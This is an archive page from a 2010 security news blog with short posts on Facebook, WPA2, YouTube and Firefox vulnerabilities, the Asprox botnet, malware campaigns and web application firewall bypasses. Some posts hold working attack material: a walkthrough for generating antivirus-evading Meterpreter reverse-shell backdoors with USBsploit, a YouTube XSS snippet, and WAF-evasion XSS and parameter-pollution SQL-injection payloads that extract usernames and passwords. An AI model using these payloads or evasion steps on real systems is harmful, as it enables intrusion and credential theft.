Archive for category Vulnerabilities & attacks
Vulnerability Makes All Facebook Accounts Exposed
Posted by Mourad Ben Lakhoua in Social Networking, Vulnerabilities, Vulnerabilities & attacks on August 13, 2010
New Vulnerability has been discovered in facebook that allows an attacker to obtain all users credential on the social network website. By having the email address an attacker can get the name and pictures of victims.
The vulnerability can works regardless of the account privacy settings, this mean that even if your account hidden from all search engines it is possible to have the sensitive information.
The result of gathered information can be used for phishing attacks or any other issue.
According to the researchers if someone has a list of email address that he has no clue about. He can feed them to Facebook one by one (or in a list, using a script like this) and chances are that he’ll get more than 50% hits. Useful for phishing attacks (People will get more convinced when they see their *real* names).
Or an attacker can randomly generate email addresses and create a database with user’s names and pictures, which mean that you have no privacy and your information, can be easily found.
Update :
Facebook, in a statement sent to SCMagazineUS.com on Thursday, said the glitch has been fixed.
“We have technical systems in place to prevent people’s names and profile photos from showing to unrelated users upon login, but a recently introduced bug temporarily prevented these from working as intended,” Facebook said in a statement. “We remedied the situation swiftly.”
make sure you subscribe to my RSS feed!
WPA2 Might Be Spoofed!
Posted by Mourad Ben Lakhoua in News, Privacy & data protection, Vulnerabilities, Vulnerabilities & attacks on July 26, 2010
WPA2 (Wireless Protected Access ver. 2.0) – is the second version of a set of algorithms and protocols that protect data in wireless networks. As expected, WPA2 should significantly increase the security of wireless networks Wi-Fi compared with previous technologies. The standard provides the mandatory use of more powerful encryption algorithm AES (Advanced Encryption Standard) and authentication of 802.1X.
Panel of researchers reported discovering vulnerability in this protocol while it is widely used as a secure standard for wireless network. AirTight Networks said that this vulnerability concerns networks that match the IEEE802.11 Standard. The first demonstration of this vulnerability will be held in Defcon 18 on this week at Vegas.
Hole 196 is the name of this vulnerability and it uses the Man-in-the-middle method of attack, where the user is authorized in a WiFi network to intercept and decrypt all data transmitted and received by others on the same wireless network. Information that the exploit code will be publicly available, so that everyone can test it and use it, while there will be update by and standardizing bodies have been able to make adjustments in WP2.
Md Sohail Ahmad who will be demonstrating the attack at Defcon says that it took about 10 lines of code in open source MadWiFi driver software, freely available on the Internet, and an off-the-shelf client card for him to spoof the MAC address of the AP, pretending to be the gateway for sending out traffic. Clients who receive the message see the client as the gateway and “respond with PTKs”, which are private and which the insider can decrypt.
We will be following this research especially that all Access points are using this protocol and there should be un update available before the demo to fix this vulnerability.
make sure you subscribe to my RSS feed!
Spreading Ghosts Attacks
Posted by Mourad Ben Lakhoua in Anti-Viruses, Vulnerabilities & attacks, hacking on July 23, 2010
Leonardo Da vinci is widely considered to be one of the greatest painters of all time, and perhaps the most diversely talented person ever to have lived. Leonardo said that there are three types of people that one may encounter: “Those who see. Those who see when they are shown. Those who do not see.”
But here I want to add a class of people who see even if they are prevented – we are talking about the Hacker class.
One of the first things an attacker will do to compromise a remote system is use a Backdoor. I am referring to a ghost – a piece of software that by running it an attacker can have access to a remote system and collect all activities on the targeted machine.
USBsploit is a tool that is still in beta version and has been created by an Infosec researcher and owner of the popular portal Secubs. This tool makes it simple for any person looking to generate Backdoors within a few steps.
First, you need to start with choosing the right distribution, this can be Backtrack/Debian or Ubuntu with the original dependency from Metasploit, than you can follow the clear and easy steps mentioned on the official website.
When you run USBsploit you will find a menu with the list of action you are looking to perform:
1. Create a Backdoor
2. Create a Backdoor and launch a Listener only for the USB Dump attack
3. Launch a Listener for the USB Dump attack from the last Dump configuration file
4. Update the USBsploit Framework
5. Edit the last Dump configuration file (needs vi)
6. Edit the global options (needs vi)
7. Edit the file extensions set to dump (needs vi)
If you choose to create a Backdoor you will be asked to select the IP address of the listener, and by default it will detect local machine IP.
Next you will be asked to select the kind of backdoor you are looking to deploy, depending on victim’s Operating system:
1. Windows Meterpreter Reverse_TCP Spawn a shell on victim and send back to attacker.
2. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64)
3. Windows Meterpreter Egress Buster Spawn a shell and find a port home via multiple ports
And here an important step you will be choosing the kind of encodings to try and bypass weak Antiviruses.
Select one of the below, Backdoored Executable is typically the best.
1. shikata_ga_nai (Very Good)
2. Multi-Encoder (Excellent)
3. Backdoored Executable (BEST)
After encoding you will find the executable file in “/opt/usbsploit/lib/msf/data/usbsploitbackdoor.exe”
This amazing tools helps to create a backdoor that can bypass most popular antiviruses in just a few steps.
My experience was interesting because when testing the generated executable file that had been encoded by msfencode, only 10 out of 42 antiviruses detected it as a Trojan.
You can run the .exe file on a windows machine even if it contains one of the Antiviruses that was not able to detect the malicious code, even with the latest definition such as Kaspersky and activate the listener.
Here you will access all activities on the target machine and have total visibility of the whole system.
make sure you subscribe to my RSS feed!
Mozilla Sniffer Add-on Blocklisted for Security Purposes
Posted by Mourad Ben Lakhoua in Browser, Software Security, Vulnerabilities & attacks on July 15, 2010
Mozilla has blocklisted a malicious plugin that has been submitted on their official website as an add-on since 6th of June, the add-on named Mozilla Sniffer and contains a serious security vulnerability.
According to a blog post the plugin includes a code that intercepts all login data on any website and sends this credential to a remote location. Mozilla security specialists informed that All current users should receive an uninstall notification and invite all users to remove the plugin and change all web authentication credential they are using.
The Plugin code has not been verified as it has been submitted online directly, it was just checked against malware without reviewing the functionality before make it public. While a new method of work will be considered in the future with a purpose to Review Process & Delightful Add-ons.
On the same post security vulnerability in CoolPreviews version 3.0.1 has been reported. This plugin help users in previewing a link in a website by just putting the cursor on it. The Bug allows an attacker to execute a malicious JavaScript code with local privileges, potentially gaining access to the file system and allowing code download and execution.
Currently, 177,000 users have a vulnerable version installed. All users are invited to update the plugin while the vulnerable versions will be blocklisted soon.
make sure you subscribe to my RSS feed!
Fake Windows IME Trojan
Posted by Mourad Ben Lakhoua in Cybercrime & Hacking, Vulnerabilities & attacks on July 11, 2010
Security researchers at Websense have discovered a new Trojan that are using a windows system to disable and delete antivirus software and compromising victim machine.
The Malicious program installs itself as the Windows input method editor (IME) and then stop all AV processes and delete the executable files and mask itself in the system as an antivirus update package.
Websense has issued a blog post defining the way that this Trojan is able to infect windows system. After running the malware a winnea.ime will be created under the system folder in windows.
By opening the default input method, the previous created file winnea.ime will start to search and detects antiviruses.
At the same time, winnea.ime creates a file called pcij.sys to the system folder and loads it as a driver process.
Next DeviceIOControl kills the running process of any antivirus in the list; the control code is sent to the driver process pcij.sys
As it is clear that the input method in Windows is now a popular way for hackers to inject malicious code.
make sure you subscribe to my RSS feed!
Cross-site scripting on YouTube
Posted by Mourad Ben Lakhoua in News, Vulnerabilities, Vulnerabilities & attacks, Web Security on July 4, 2010
XSS vulnerability in YouTube comments processing allows an attacker to execute arbitrary scripts in the security context.
Go on youtube. Choose any video. Add the following script:
<script>IF_HTML_FUNCTION?<h1><marquee><font color="red"><u>add your comment here<script>
Update (1): It is better to stay away from YouTube until they fix the vulnerability or at least logging out of YouTube if you use it.
Update (2): Google has informed that the vulnerability has now been fixed:
We took swift action to fix a cross-site scripting (XSS) vulnerability on youtube.com that was discovered several hours ago. Comments were temporarily hidden by default within an hour, and we released a complete fix for the issue in about two hours. We’re continuing to study the vulnerability to help prevent similar issues in the future.
you can find the statement here.
make sure you subscribe to my RSS feed!
Asprox is back!
Posted by Mourad Ben Lakhoua in Cybercrime, Cybercrime & Hacking, Vulnerabilities & attacks on June 27, 2010
Security researchers warn of a fast increase in the infected website with spam-botnet Asprox. Asprox botnet is carrying out attack using SQL-injection, which allowed this botnet to double its presence on the service provider’s access application. For one night the number of compromised resources increased from 5 to 11 thousand.
The botnet usually starts by scanning the network searching for a vulnerable host and if it detects a vulnerable website it conducts an attack on the targeted hosts.
M86 Security Company are currently monitoring and tracking the new threat. On a blog post Rodel Mendrez reported that the pattern of Asprox behavior have changed, while previously it used only to send spams, now it is implementing a massive SQL-injection.
As of this writing, there are three fast-flux domains that the bot attempts to contact.
CL63AMGSTART.RU
HYPERVMSYS.RU
ML63AMGSTART.RU
These three servers are the bot command and control servers, by analyzing the malware binary there are SQL statement as the picture shows:
By decrypting the XML file which the bot receives. Screen shot shows information about the targeted website:
And finally a simple search on Google shows that more than 5000 websites already infected.
As you can see that criminals are always searching for new ways to spread their malwares.
make sure you subscribe to my RSS feed!
Mozilla Fixes 9 vulnerabilities & adds a Crash Protection to Firefox
Posted by Mourad Ben Lakhoua in Vulnerabilities, Vulnerabilities & attacks, Web Security on June 24, 2010
A new release has been issued by Mozilla. Firefox 3.6.4 is the first open source web browser that integrates the plugins functionality in the main process of the navigator. This release comes to decrease the number of Firefox crashes.
As usual you can find two versions for both Linux and Windows operating systems.
Mike Beltzner wrote on the company’s blog that during beta testing the new feature has significantly reduced the number of freezing that users face while watching online videos or playing online games. At the same time this new release supports a functionality to protect users against plugin failures such as Adobe Flash, Apple Quicktime and Microsoft Silverlight.
All these functionalities comes with fixing 9 vulnerabilities, six are critical and allows and attacker to compromise the system and run a malicious software on the machine.
It is time to upgrade your browser and check if you have any update missed.
make sure you subscribe to my RSS feed!
Fake YouTube Pages Spreading Malware
Posted by Mourad Ben Lakhoua in Cybercrime, Internet, News, Vulnerabilities & attacks on June 10, 2010
Researchers at eSoft Threat Prevention Team have discovered thousands of fake websites that looks like YouTube. The website contains video which leads to installing a downloader Trojan with a less than 20% detection rate according to Virus Total.
The site is looking very closely to Youtube with a high quality to make it looks legitimate and trick victims. Cybercriminals exploit the trust of users in youtube video hosting to have as much as possible of machine.
The pages contain some “Hot Video”, like Want to see a revealing video about the Gulf oil spill in Mexico or the NBA Finals?
This will attract victims so they agree to install the malicious application with a big possibility that the Antivirus even do not suspect in this file.
According to the eSoft Threat Prevention Team, there are now over 135,000 such sites sprouting up all over the Web this can be found by Google search engine. So do not trust websites and try as much as possible to update your antivirus definition with use web filters to detect and prevent these threats.
make sure you subscribe to my RSS feed!
Detecting & Bypassing Web Application Firewalls (part 2)
Posted by Mourad Ben Lakhoua in Vulnerabilities, Vulnerabilities & attacks, Web Security on May 30, 2010
There is no single ideal system in the world, and this applies to Web application firewalls too (WAF’s).
While the advantages and positive features far outweigh the negative in WAF’s, one major problem is there are only a few action rules allowed. The white list is expanding, and requires more development efforts because it is very important to clearly establish allowed parameters.
The second major problem is that sometimes WAF vendors fail to update their signature definitions, or do not develop the required security rule on time, and this can put the web server at risk of attacks.
The first vulnerability is (http://www.security-database.com/detail.php?alert=CVE-2009-1593), which allows the inserting extra characters in the JavaScript close tag to bypass the XSS protection mechanisms. An example is shown below: http://testcases/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3
Another example (http://www.security-database.com/detail.php?alert=CVE-2009-1594) also allows remote attackers to bypass certain protection mechanisms via a %0A (encoded newline), as demonstrated by a %0A in a cross-site scripting (XSS) attack URL.
HTTP Parameter Pollution (HPP)
HPP was first developed by two Italian network experts, Luca Carettoni and Stefano diPaola. HPP provides an attacker the ability to submit new HTTP-parameters (POST, GET) with multiple input parameters (query string, post data, cookies, etc.) with same name.
The application may react in unexpected ways and open up new avenues of server-side and client-side exploitation. The most outstanding example is a vulnerability in IIS + ModSecurity which allows SQL-injection based attacks on two features:
1. IIS HTTP parameters submit the same name. for Example:
POST /index.aspx?a=1&a=2 HTTP/1.0
Host: www.example.com
Cookie: a=5;a=6
Content-type: text/plain
Content-Length: 7
Connection: close
a=3&a=4
If such a request to IIS/ASP.NET setting a (Request.Params["a"]) is equal to 1,2,3,4,5,6.
2. ModSecurity analyzes the request after that it has been already processed by webserver. And reject it: http://testcases/index.aspx?id=1+UNION+SELECT+username,password+FROM+users
However the query submitted:
POST /index.aspx?a=-1%20union/*&a=*/select/* HTTP/1.0
Host: www.example.com
Cookie: a=*/from/*;a=*/users
Content?Length: 21
a=*/name&a=password/*
The database as a result will do the correct query:
SELECT b, c FROM t WHERE a =- 1 /*,*/ UNION /*,*/ SELECT /*,*/ username, password /*,*/ FROM /*,*/ users
XSS
Cross Site Scripting (XSS) is probably the best method for exploiting the Web application firewall (WAF). This is due to JavaScript’s flexibility. At the BlackHat conference, there were a large number of methods to trick filters. For example:
object data=”javascript:alert(0)”
isindex action=javascript:alert(1) type=image
img src=x:alert(alt) onerror=eval(src) alt=0
x:script xmlns:x=”http://www.w3.org/1999/xhtml” alert (‘xss’); x: script
More XSS information can be found on the following links:
– http://ha.ckers.org/xss.html
– http://sla.ckers.org/forum/list.php?24
– http://maliciousmarkup.blogspot.com/
New developments in Web Application Firewalls is forthcoming. However, sometimes it seems that everything has already been discovered, and that it makes no sense to search for something new, but there is always room for new research.
It is very important to look at all details of the WAF to ensure you have a clear vision of your security assets.
make sure you subscribe to my RSS feed!
-
You are currently browsing the archives for the Vulnerabilities & attacks category.
SUBSCRIBE
Latest Comments